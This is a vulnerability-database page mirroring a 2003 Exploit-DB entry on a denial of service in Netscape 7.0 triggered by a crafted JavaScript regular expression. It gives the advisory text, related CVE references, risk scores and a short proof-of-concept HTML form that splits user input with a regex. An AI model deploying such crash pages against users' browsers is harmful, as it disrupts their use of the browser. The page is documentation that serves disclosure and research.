Lucene search
+L

Netscape 7.0 - JavaScript Regular Expression Denial of Service

🗓️ 25 Feb 2003 00:00:00Reported by dwmType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

Netscape 7.0 may crash due to crafted JavaScript, causing denial of service vulnerability.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-1419
20 Oct 200710:00
cve
cvelist
Cvelist
CVE-2003-1419
20 Oct 200710:00
cvelist
euvd
EUVD
EUVD-2003-1409
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-1419
31 Dec 200305:00
nvd
source: https://www.securityfocus.com/bid/6959/info

It has been reported that Netscape based browsers may be vulnerable to a denial of service condition when executing certain JavaScript methods.

If a malicious page containing a specially crafted JavaScript regular expression method is viewed the browser reportedly becomes un-stable this may result in the critical failure of an affected browser.

This vulnerability was reported for Netscape version 7. It is not known if previous versions are also affected.

<html>
<head>
<title>test</title>
<--script-- language="JavaScript">
function reformatDate(someDate) {
var tokens = someDate.split(/(\/|-)/);
if (tokens[1].length == 1) tokens[1] = "0" + tokens[1];
if (tokens[0].length == 1) tokens[0] = "0" + tokens[0];
var result = tokens[2] + tokens[1] + tokens[0];
alert(result);
//return result;
}
</--script-->
</head>
<body>
<form action="" method="GET" name="form1" onSubmit="return reformatDate(this.dt.value);">
MM/DD/YYYY - <input type=text name=dt>
<input type=submit>
</form>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.0215
29